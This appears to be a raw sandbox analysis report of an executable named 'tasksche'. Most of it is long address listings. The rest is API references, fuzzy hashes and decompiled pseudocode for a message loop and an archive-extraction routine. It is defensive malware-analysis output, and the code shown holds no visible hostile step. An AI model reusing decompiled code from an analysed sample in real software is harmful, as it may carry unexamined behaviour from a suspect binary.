                                                                                              0x00407807
                                                                                              0x0040781a
                                                                                              0x0040781f
                                                                                              0x00407826
                                                                                              0x00407871
                                                                                              0x00407876
                                                                                              0x00407878
                                                                                              0x0040788a
                                                                                              0x00407890
                                                                                              0x00407896
                                                                                              0x004078a9
                                                                                              0x004078af
                                                                                              0x004078bd
                                                                                              0x004078c0
                                                                                              0x004078c4
                                                                                              0x004078c8
                                                                                              0x004078cc
                                                                                              0x004078df
                                                                                              0x004078e2
                                                                                              0x004078e8
                                                                                              0x004078ea
                                                                                              0x004078f7
                                                                                              0x004078f7
                                                                                              0x004078f7
                                                                                              0x004078f9
                                                                                              0x004078fc
                                                                                              0x0040790d
                                                                                              0x00407912
                                                                                              0x00407914
                                                                                              0x00408204
                                                                                              0x00408204
                                                                                              0x0040778b
                                                                                              0x0040778c
                                                                                              0x00407791
                                                                                              0x00407799
                                                                                              0x00407799
                                                                                              0x0040791f
                                                                                              0x00407930
                                                                                              0x00407935
                                                                                              0x00407939
                                                                                              0x0040794e
                                                                                              0x0040794e
                                                                                              0x00407952
                                                                                              0x00407952
                                                                                              0x00407955
                                                                                              0x0040795c
                                                                                              0x00407967
                                                                                              0x00407967
                                                                                              0x0040796c
                                                                                              0x00407975
                                                                                              0x0040797b
                                                                                              0x00407980
                                                                                              0x0040798a
                                                                                              0x0040798f
                                                                                              0x00407991
                                                                                              0x004079c5
                                                                                              0x004079cc
                                                                                              0x004079cc
                                                                                              0x004079d2
                                                                                              0x004079d2
                                                                                              0x004079de
                                                                                              0x00407a18
                                                                                              0x00407a22
                                                                                              0x00407a27
                                                                                              0x00407a29
                                                                                              0x00407a2f
                                                                                              0x00407a32
                                                                                              0x00407a32
                                                                                              0x00407a45
                                                                                              0x00407a4c
                                                                                              0x00407a4e
                                                                                              0x00407a50
                                                                                              0x00407a7e
                                                                                              0x00407a80
                                                                                              0x00407a94
                                                                                              0x00407a97
                                                                                              0x00407a9c
                                                                                              0x00407aa3
                                                                                              0x00407aa5
                                                                                              0x00407aac
                                                                                              0x00407abb
                                                                                              0x00407ac3
                                                                                              0x00407ac5
                                                                                              0x00407ac7
                                                                                              0x00407ace
                                                                                              0x00407ad6
                                                                                              0x00407ae2
                                                                                              0x00407ae7
                                                                                              0x00407ae7
                                                                                              0x00407ace
                                                                                              0x00407ac5
                                                                                              0x00407aac
                                                                                              0x00407aeb
                                                                                              0x00407af1
                                                                                              0x00407af6
                                                                                              0x00407afc
                                                                                              0x00407afe
                                                                                              0x00407b02
                                                                                              0x00407b06
                                                                                              0x00407b0a
                                                                                              0x00407b93
                                                                                              0x00407b93
                                                                                              0x00407b95
                                                                                              0x00407b9a
                                                                                              0x00407b9c
                                                                                              0x00407c29
                                                                                              0x00407c2d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407c2f
                                                                                              0x00407c3a
                                                                                              0x00407c3c
                                                                                              0x00407c41
                                                                                              0x00000000
                                                                                              0x00407c41
                                                                                              0x00407ba2
                                                                                              0x00407ba6
                                                                                              0x00407c06
                                                                                              0x00407c0c
                                                                                              0x00407c10
                                                                                              0x00407c15
                                                                                              0x00407c1f
                                                                                              0x00000000
                                                                                              0x00407c1f
                                                                                              0x00407ba8
                                                                                              0x00407bad
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407baf
                                                                                              0x00407bb4
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407bb6
                                                                                              0x00407bbb
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407bbd
                                                                                              0x00407bc0
                                                                                              0x00407bc3
                                                                                              0x00407bca
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407bcc
                                                                                              0x00407bcc
                                                                                              0x00407bcc
                                                                                              0x00407bd8
                                                                                              0x00407bd9
                                                                                              0x00407bda
                                                                                              0x00407bdf
                                                                                              0x00000000
                                                                                              0x00407b10
                                                                                              0x00407b10
                                                                                              0x00407b13
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407b15
                                                                                              0x00407b19
                                                                                              0x00407c4c
                                                                                              0x00407c4c
                                                                                              0x00407c4f
                                                                                              0x00407c4f
                                                                                              0x00407c56
                                                                                              0x00407c7d
                                                                                              0x00407c81
                                                                                              0x004081a5
                                                                                              0x004081ab
                                                                                              0x004081af
                                                                                              0x004081b4
                                                                                              0x004081be
                                                                                              0x004081c3
                                                                                              0x004081c7
                                                                                              0x004081c9
                                                                                              0x004081c9
                                                                                              0x004081c9
                                                                                              0x004081c9
                                                                                              0x004081cf
                                                                                              0x004081cf
                                                                                              0x004081d2
                                                                                              0x004081d9
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004081db
                                                                                              0x004081df
                                                                                              0x00407789
                                                                                              0x00407789
                                                                                              0x00000000
                                                                                              0x00407789
                                                                                              0x004081e5
                                                                                              0x004081ec
                                                                                              0x004081fa
                                                                                              0x004081fe
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004081fe
                                                                                              0x004081ee
                                                                                              0x004081f0
                                                                                              0x00000000
                                                                                              0x004081f0
                                                                                              0x00407c87
                                                                                              0x00407c8a
                                                                                              0x00407c8f
                                                                                              0x00407c92
                                                                                              0x00407ca4
                                                                                              0x00407ca4
                                                                                              0x00407ca8
                                                                                              0x00407e5c
                                                                                              0x00407e5c
                                                                                              0x00407e60
                                                                                              0x00407e64
                                                                                              0x00407cef
                                                                                              0x00407cef
                                                                                              0x00407cf7
                                                                                              0x00407cfd
                                                                                              0x00407d03
                                                                                              0x00407d09
                                                                                              0x00407d26
                                                                                              0x00407d3c
                                                                                              0x00407d4d
                                                                                              0x00407d57
                                                                                              0x00407d5e
                                                                                              0x00407d63
                                                                                              0x00407d69
                                                                                              0x00407d6c
                                                                                              0x00407d6f
                                                                                              0x00407d71
                                                                                              0x00407de2
                                                                                              0x00407de2
                                                                                              0x00407def
                                                                                              0x00407df3
                                                                                              0x00407df9
                                                                                              0x00407e0c
                                                                                              0x00407e0c
                                                                                              0x00407e10
                                                                                              0x00407e10
                                                                                              0x00407e14
                                                                                              0x00407e18
                                                                                              0x00407e1c
                                                                                              0x00407f1c
                                                                                              0x00407f23
                                                                                              0x00407f25
                                                                                              0x00407f2c
                                                                                              0x00407f51
                                                                                              0x00407f52
                                                                                              0x00407f58
                                                                                              0x00407f63
                                                                                              0x00407f69
                                                                                              0x00407f6f
                                                                                              0x00407f75
                                                                                              0x00407f7b
                                                                                              0x00407f98
                                                                                              0x00407f2e
                                                                                              0x00407f2e
                                                                                              0x00407f34
                                                                                              0x00407f3a
                                                                                              0x00407f3d
                                                                                              0x00407f3d
                                                                                              0x00407f2c
                                                                                              0x00407f9d
                                                                                              0x00407f9f
                                                                                              0x00407fa4
                                                                                              0x00407fab
                                                                                              0x00407fdb
                                                                                              0x00407fdb
                                                                                              0x00407fdb
                                                                                              0x00407fdd
                                                                                              0x00407fdd
                                                                                              0x00407fe4
                                                                                              0x00407fef
                                                                                              0x00407ff6
                                                                                              0x00408017
                                                                                              0x00408017
                                                                                              0x0040801b
                                                                                              0x0040801f
                                                                                              0x0040807d
                                                                                              0x0040807d
                                                                                              0x00408081
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00408087
                                                                                              0x0040808c
                                                                                              0x00408099
                                                                                              0x00408099
                                                                                              0x0040809d
                                                                                              0x004080b6
                                                                                              0x004080b6
                                                                                              0x004080ba
                                                                                              0x004080d7
                                                                                              0x004080d7
                                                                                              0x004080da
                                                                                              0x004080e1
                                                                                              0x004080e3
                                                                                              0x004080e3
                                                                                              0x004080e3
                                                                                              0x004080e3
                                                                                              0x004080f5
                                                                                              0x00408108
                                                                                              0x0040811b
                                                                                              0x0040812c
                                                                                              0x00408137
                                                                                              0x00408147
                                                                                              0x00408154
                                                                                              0x00408165
                                                                                              0x0040816a
                                                                                              0x0040816d
                                                                                              0x00408174
                                                                                              0x00408183
                                                                                              0x00408188
                                                                                              0x0040818a
                                                                                              0x00408199
                                                                                              0x00408199
                                                                                              0x0040818a
                                                                                              0x0040819e
                                                                                              0x00000000
                                                                                              0x0040819e
                                                                                              0x004080bc
                                                                                              0x004080bf
                                                                                              0x004080c6
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004080d2
                                                                                              0x00000000
                                                                                              0x004080d2
                                                                                              0x0040809f
                                                                                              0x004080a6
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004080ac
                                                                                              0x004080b0
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004080b0
                                                                                              0x0040808e
                                                                                              0x00408093
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00408093
                                                                                              0x00408021
                                                                                              0x00408025
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00408027
                                                                                              0x00408029
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040802b
                                                                                              0x00408031
                                                                                              0x0040805b
                                                                                              0x00408061
                                                                                              0x00408065
                                                                                              0x00408066
                                                                                              0x00408068
                                                                                              0x00408068
                                                                                              0x00408074
                                                                                              0x00408078
                                                                                              0x00000000
                                                                                              0x00408078
                                                                                              0x00408033
                                                                                              0x00408039
                                                                                              0x00408043
                                                                                              0x00408043
                                                                                              0x0040804a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00408052
                                                                                              0x00408056
                                                                                              0x00408057
                                                                                              0x00000000
                                                                                              0x00408057
                                                                                              0x0040803b
                                                                                              0x00408041
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00408041
                                                                                              0x00407ff8
                                                                                              0x00407fff
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00408001
                                                                                              0x0040800c
                                                                                              0x0040800c
                                                                                              0x0040800e
                                                                                              0x00408010
                                                                                              0x00408010
                                                                                              0x00000000
                                                                                              0x0040800e
                                                                                              0x00408003
                                                                                              0x0040800a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040800a
                                                                                              0x00407fe6
                                                                                              0x00000000
                                                                                              0x00407fe6
                                                                                              0x00407fb6
                                                                                              0x00407fce
                                                                                              0x00407fd3
                                                                                              0x00407fd5
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407fd7
                                                                                              0x00000000
                                                                                              0x00407fd7
                                                                                              0x00407e22
                                                                                              0x00407e28
                                                                                              0x00407e2b
                                                                                              0x00407e88
                                                                                              0x00407e9c
                                                                                              0x00407e9e
                                                                                              0x00407ea3
                                                                                              0x00407ea7
                                                                                              0x00407eeb
                                                                                              0x00407eeb
                                                                                              0x00407ef2
                                                                                              0x00407efe
                                                                                              0x00407efe
                                                                                              0x00407f02
                                                                                              0x00407f0f
                                                                                              0x00407f0f
                                                                                              0x00407f0f
                                                                                              0x00407f11
                                                                                              0x00407f11
                                                                                              0x00000000
                                                                                              0x00407f11
                                                                                              0x00407f04
                                                                                              0x00407f04
                                                                                              0x00407f08
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407f0c
                                                                                              0x00000000
                                                                                              0x00407f0c
                                                                                              0x00407ef4
                                                                                              0x00407ef8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407efa
                                                                                              0x00407efa
                                                                                              0x00000000
                                                                                              0x00407efa
                                                                                              0x00407ea9
                                                                                              0x00407eb1
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407eb3
                                                                                              0x00407ebe
                                                                                              0x00407ec5
                                                                                              0x00407ec6
                                                                                              0x00407ec9
                                                                                              0x00407ed5
                                                                                              0x00407edc
                                                                                              0x00407edf
                                                                                              0x00407ecb
                                                                                              0x00407ecb
                                                                                              0x00407ecb
                                                                                              0x00407ee4
                                                                                              0x00407ee4
                                                                                              0x00407ee7
                                                                                              0x00407ee9
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407ee9
                                                                                              0x00407e2d
                                                                                              0x00407e30
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407e32
                                                                                              0x00407e35
                                                                                              0x00407e6f
                                                                                              0x00407e6f
                                                                                              0x00407e73
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407e7b
                                                                                              0x00407e81
                                                                                              0x00000000
                                                                                              0x00407e81
                                                                                              0x00407e37
                                                                                              0x00407e3a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407e3c
                                                                                              0x00407e3f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407e4e
                                                                                              0x00407e53
                                                                                              0x00000000
                                                                                              0x00407e53
                                                                                              0x00407dfb
                                                                                              0x00407dff
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407e01
                                                                                              0x00407e06
                                                                                              0x00407e0a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407e0a
                                                                                              0x00407d73
                                                                                              0x00407d79
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407d7b
                                                                                              0x00407d87
                                                                                              0x00407d8d
                                                                                              0x00407d97
                                                                                              0x00407d9a
                                                                                              0x00407d9c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407d9e
                                                                                              0x00407da4
                                                                                              0x00407da4
                                                                                              0x00407da6
                                                                                              0x00407dcb
                                                                                              0x00407ddd
                                                                                              0x00000000
                                                                                              0x00407ddd
                                                                                              0x00407da8
                                                                                              0x00407db2
                                                                                              0x00407db4
                                                                                              0x00407db9
                                                                                              0x00407dbf
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407dc1
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407dc3
                                                                                              0x00407dc9
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407dc9
                                                                                              0x00407daa
                                                                                              0x00407db0
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407db0
                                                                                              0x00407da0
                                                                                              0x00407da2
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407da2
                                                                                              0x00407ce9
                                                                                              0x00407ce9
                                                                                              0x00407ce9
                                                                                              0x00407ce9
                                                                                              0x00000000
                                                                                              0x00407ce9
                                                                                              0x00407cae
                                                                                              0x00407cb3
                                                                                              0x00407cb7
                                                                                              0x00407cbf
                                                                                              0x00407cc4
                                                                                              0x00407cc6
                                                                                              0x00407cd5
                                                                                              0x00407ce4
                                                                                              0x00407ce4
                                                                                              0x00407cc6
                                                                                              0x00000000
                                                                                              0x00407cb7
                                                                                              0x00407c94
                                                                                              0x00407c9b
                                                                                              0x00407c9e
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407c9e
                                                                                              0x00407c65
                                                                                              0x00407c69
                                                                                              0x00407c6d
                                                                                              0x00407c72
                                                                                              0x00407c74
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407c76
                                                                                              0x00407be1
                                                                                              0x00407be7
                                                                                              0x00407beb
                                                                                              0x00407bf0
                                                                                              0x00407bfa
                                                                                              0x00407bff
                                                                                              0x00000000
                                                                                              0x00407bff
                                                                                              0x00407b1f
                                                                                              0x00407b24
                                                                                              0x00407b27
                                                                                              0x00407c44
                                                                                              0x00407c44
                                                                                              0x00407c48
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407c4a
                                                                                              0x00407b2d
                                                                                              0x00407b30
                                                                                              0x00407b37
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407b3d
                                                                                              0x00407b44
                                                                                              0x00407b48
                                                                                              0x00407b4d
                                                                                              0x00407b4f
                                                                                              0x00407b80
                                                                                              0x00407b80
                                                                                              0x00407b84
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407b8a
                                                                                              0x00407b8a
                                                                                              0x00000000
                                                                                              0x00407b8a
                                                                                              0x00407b51
                                                                                              0x00407b55
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407b7b
                                                                                              0x00000000
                                                                                              0x00407b7b
                                                                                              0x00407b0a
                                                                                              0x004079ea
                                                                                              0x004079ef
                                                                                              0x004079f1
                                                                                              0x004079ff
                                                                                              0x00407a02
                                                                                              0x00407a09
                                                                                              0x00407a0f
                                                                                              0x00407a14
                                                                                              0x00407a14
                                                                                              0x00000000
                                                                                              0x00407a09
                                                                                              0x004079f3
                                                                                              0x00000000
                                                                                              0x004079f3
                                                                                              0x004079ce
                                                                                              0x004079ce
                                                                                              0x00000000
                                                                                              0x004079ce
                                                                                              0x004079a0
                                                                                              0x004079a5
                                                                                              0x004079a7
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004079a9
                                                                                              0x004079b0
                                                                                              0x00000000
                                                                                              0x004079b2
                                                                                              0x004079be
                                                                                              0x00000000
                                                                                              0x004079be
                                                                                              0x004079b0
                                                                                              0x0040796e
                                                                                              0x00407973
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407973
                                                                                              0x0040795e
                                                                                              0x00407965
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407965
                                                                                              0x0040793b
                                                                                              0x0040793f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407941
                                                                                              0x00407948
                                                                                              0x0040794c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040794c
                                                                                              0x004078ec
                                                                                              0x004078f1
                                                                                              0x00000000
                                                                                              0x004078f3
                                                                                              0x004078f3
                                                                                              0x00000000
                                                                                              0x004078f3
                                                                                              0x004078f1
                                                                                              0x004078ce
                                                                                              0x004078d4
                                                                                              0x004078d7
                                                                                              0x004078d9
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004078d9
                                                                                              0x0040787a
                                                                                              0x0040787d
                                                                                              0x00407884
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407886
                                                                                              0x00407886
                                                                                              0x00000000
                                                                                              0x00407886
                                                                                              0x0040782b
                                                                                              0x00407831
                                                                                              0x00407834
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407836
                                                                                              0x0040783a
                                                                                              0x00000000
                                                                                              0x0040783c
                                                                                              0x0040783c
                                                                                              0x0040783e
                                                                                              0x00407840
                                                                                              0x00407840
                                                                                              0x00407843
                                                                                              0x0040785b
                                                                                              0x0040785d
                                                                                              0x00000000
                                                                                              0x0040785f
                                                                                              0x0040785f
                                                                                              0x00407868
                                                                                              0x00000000
                                                                                              0x00407868
                                                                                              0x0040785d
                                                                                              0x0040783a
                                                                                              0x004077b5
                                                                                              0x004077bb
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004077bd
                                                                                              0x004077c4
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004077c4
                                                                                              0x00407718
                                                                                              0x0040771b
                                                                                              0x0040773a
                                                                                              0x0040773a
                                                                                              0x0040773d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407743
                                                                                              0x0040774a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040775a
                                                                                              0x0040775f
                                                                                              0x00407761
                                                                                              0x00407786
                                                                                              0x00000000
                                                                                              0x00407763
                                                                                              0x0040776a
                                                                                              0x00000000
                                                                                              0x0040776a
                                                                                              0x00407761
                                                                                              0x0040771d
                                                                                              0x00407724
                                                                                              0x00000000
                                                                                              0x0040772a
                                                                                              0x00407735
                                                                                              0x00000000
                                                                                              0x00407735
                                                                                              0x00407724
                                                                                              0x004076e2
                                                                                              0x00407701
                                                                                              0x00407701
                                                                                              0x00000000
                                                                                              0x00407701
                                                                                              0x004076f3
                                                                                              0x00000000
                                                                                              0x004076f5
                                                                                              0x004076fc
                                                                                              0x00000000
                                                                                              0x004076fc

                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 004076AF
                                                                                                • Part of subcall function 00418B3D: _wcscpy.LIBCMT ref: 00418C26
                                                                                              • _memcmp.LIBCMT ref: 00407ABB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog_memcmp_wcscpy
                                                                                              • String ID: E
                                                                                              • API String ID: 1926841707-3568589458
                                                                                              • Opcode ID: 6c4558fb238d66dc116ff5003075a2549135680b9de7e03f82a9277970bbe958
                                                                                              • Instruction ID: c8680630b07ceb330da05956c27536b96a03d31217007f6de18683c0289c3294
                                                                                              • Opcode Fuzzy Hash: 6c4558fb238d66dc116ff5003075a2549135680b9de7e03f82a9277970bbe958
                                                                                              • Instruction Fuzzy Hash: 4872B870D086849EEF25DB64C844BEA7BA55F05304F0840FFE94A6B2D2C77D7984CB6A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E0040D116() {
                                                                                              				struct tagMSG _v32;
                                                                                              				int _t6;
                                                                                              				long _t12;
                                                                                              
                                                                                              				_t6 = PeekMessageW( &_v32, 0, 0, 0, 0); // executed
                                                                                              				if(_t6 != 0) {
                                                                                              					GetMessageW( &_v32, 0, 0, 0);
                                                                                              					TranslateMessage( &_v32);
                                                                                              					_t12 = DispatchMessageW( &_v32); // executed
                                                                                              					return _t12;
                                                                                              				}
                                                                                              				return _t6;
                                                                                              			}






                                                                                              0x0040d127
                                                                                              0x0040d12f
                                                                                              0x0040d138
                                                                                              0x0040d142
                                                                                              0x0040d14c
                                                                                              0x00000000
                                                                                              0x0040d14c
                                                                                              0x0040d154

                                                                                              APIs
                                                                                              • PeekMessageW.USER32 ref: 0040D127
                                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0040D138
                                                                                              • TranslateMessage.USER32(?), ref: 0040D142
                                                                                              • DispatchMessageW.USER32 ref: 0040D14C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$DispatchPeekTranslate
                                                                                              • String ID:
                                                                                              • API String ID: 4217535847-0
                                                                                              • Opcode ID: db1d2709ee26d26a19af258b04a512226032370801fdef34d6f208b0e00134af
                                                                                              • Instruction ID: 62915b0a08277243b8fe4fd8ce30adb6e130eab43b2b780e39f86cd7d7c3188f
                                                                                              • Opcode Fuzzy Hash: db1d2709ee26d26a19af258b04a512226032370801fdef34d6f208b0e00134af
                                                                                              • Instruction Fuzzy Hash: 9FE0ED72E0112AA7CB20ABE19C0CDDB7F6CEE062517404021BD05E2015D638D116C7F5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 91%
                                                                                              			E0040820B(intOrPtr __ecx, intOrPtr __edx, void* __eflags) {
                                                                                              				void* __edi;
                                                                                              				void* _t47;
                                                                                              				void* _t50;
                                                                                              				signed int _t53;
                                                                                              				signed int _t54;
                                                                                              				signed int _t58;
                                                                                              				signed int _t63;
                                                                                              				signed int _t77;
                                                                                              				void* _t82;
                                                                                              				signed int _t85;
                                                                                              				void* _t97;
                                                                                              				intOrPtr _t101;
                                                                                              				void* _t103;
                                                                                              				void* _t106;
                                                                                              
                                                                                              				_t106 = __eflags;
                                                                                              				_t96 = __edx;
                                                                                              				E0041A4DC(E004296DE, _t103);
                                                                                              				E0041AAF0(0xe0f4);
                                                                                              				_t101 = __ecx;
                                                                                              				_push(_t97);
                                                                                              				E00401822(_t103 - 0xe100, __edx, _t97, _t106,  *((intOrPtr*)(__ecx + 8)));
                                                                                              				_t98 = __ecx + 0x445c;
                                                                                              				_t77 = 0;
                                                                                              				 *(_t103 - 4) = 0;
                                                                                              				_t47 = E004088FD(_t103 - 0xe100, __ecx + 0x445c);
                                                                                              				_t82 = _t103 - 0xe100;
                                                                                              				if(_t47 == 0) {
                                                                                              					L18:
                                                                                              					 *(_t103 - 4) =  *(_t103 - 4) | 0xffffffff;
                                                                                              					E00401228(_t82, _t98); // executed
                                                                                              					 *[fs:0x0] =  *((intOrPtr*)(_t103 - 0xc));
                                                                                              					return 0;
                                                                                              				}
                                                                                              				_push(1); // executed
                                                                                              				_t50 = E00401417(_t82, __edx); // executed
                                                                                              				if(_t50 != 0) {
                                                                                              					__eflags =  *(_t103 - 0x309b);
                                                                                              					if( *(_t103 - 0x309b) != 0) {
                                                                                              						L17:
                                                                                              						_t82 = _t103 - 0xe100;
                                                                                              						goto L18;
                                                                                              					}
                                                                                              					 *((intOrPtr*)(_t103 - 0x14)) = 0;
                                                                                              					__eflags =  *(_t103 - 0x30ab);
                                                                                              					if(__eflags == 0) {
                                                                                              						L10:
                                                                                              						E004070BC(_t101, _t96, _t103, __eflags, _t103 - 0xe100);
                                                                                              						_t53 =  *(_t101 + 8);
                                                                                              						_t85 =  *(_t53 + 0x72b2) & 0x0000ffff;
                                                                                              						__eflags = _t85 - 0x54;
                                                                                              						if(_t85 == 0x54) {
                                                                                              							L12:
                                                                                              							 *((char*)(_t53 + 0x51c1)) = 1;
                                                                                              							L13:
                                                                                              							_t54 =  *(_t101 + 8);
                                                                                              							__eflags =  *((short*)(_t54 + 0x72b2)) - 0x49;
                                                                                              							if( *((short*)(_t54 + 0x72b2)) != 0x49) {
                                                                                              								__eflags =  *((char*)(_t54 + 0x51c1));
                                                                                              								_t33 =  *((char*)(_t54 + 0x51c1)) == 0;
                                                                                              								__eflags =  *((char*)(_t54 + 0x51c1)) == 0;
                                                                                              								_t54 = E004116C9((_t54 & 0xffffff00 | _t33) & 0x000000ff, (_t54 & 0xffffff00 | _t33) & 0x000000ff, _t101 + 0x445c);
                                                                                              							}
                                                                                              							E00401000(_t54);
                                                                                              							do {
                                                                                              								_t58 = E004076AA(_t101, _t96, _t103 - 0xe100, E0040369F(_t96, _t103), _t103 - 0xd); // executed
                                                                                              								__eflags = _t58;
                                                                                              							} while (_t58 != 0);
                                                                                              							goto L17;
                                                                                              						}
                                                                                              						__eflags = _t85 - 0x49;
                                                                                              						if(_t85 != 0x49) {
                                                                                              							goto L13;
                                                                                              						}
                                                                                              						goto L12;
                                                                                              					}
                                                                                              					_t63 = E0041A7F7(_t103 - 0x1018, _t103 - 0xe0e2);
                                                                                              					__eflags =  *(_t103 - 0x30a6);
                                                                                              					_t98 = 0x800;
                                                                                              					while(1) {
                                                                                              						E0040A8A1(_t103 - 0x1018, _t98, (_t63 & 0xffffff00 | __eflags == 0x00000000) & 0x000000ff);
                                                                                              						E004067E1(_t103 - 0x2060);
                                                                                              						_push(0);
                                                                                              						__eflags = E004096BC(_t96, _t103 - 0x1018, _t103 - 0x2060);
                                                                                              						if(__eflags == 0) {
                                                                                              							break;
                                                                                              						}
                                                                                              						_t77 = _t77 +  *((intOrPtr*)(_t103 - 0x1060));
                                                                                              						_t63 =  *(_t103 - 0x105c);
                                                                                              						asm("adc [ebp-0x14], eax");
                                                                                              						__eflags =  *(_t103 - 0x30a6);
                                                                                              					}
                                                                                              					 *((intOrPtr*)(_t101 + 0x2210)) =  *((intOrPtr*)(_t101 + 0x2210)) + _t77;
                                                                                              					asm("adc [eax+0x4], ecx");
                                                                                              					goto L10;
                                                                                              				}
                                                                                              				if(E0040A788(_t98, L"rar") != 0) {
                                                                                              					E004062BA(0x4335ac, 1);
                                                                                              				}
                                                                                              				goto L17;
                                                                                              			}

















                                                                                              0x0040820b
                                                                                              0x0040820b
                                                                                              0x00408210
                                                                                              0x0040821a
                                                                                              0x00408221
                                                                                              0x00408223
                                                                                              0x0040822d
                                                                                              0x00408232
                                                                                              0x00408238
                                                                                              0x00408241
                                                                                              0x00408244
                                                                                              0x00408249
                                                                                              0x00408251
                                                                                              0x004083a6
                                                                                              0x004083a6
                                                                                              0x004083aa
                                                                                              0x004083b7
                                                                                              0x004083bf
                                                                                              0x004083bf
                                                                                              0x00408257
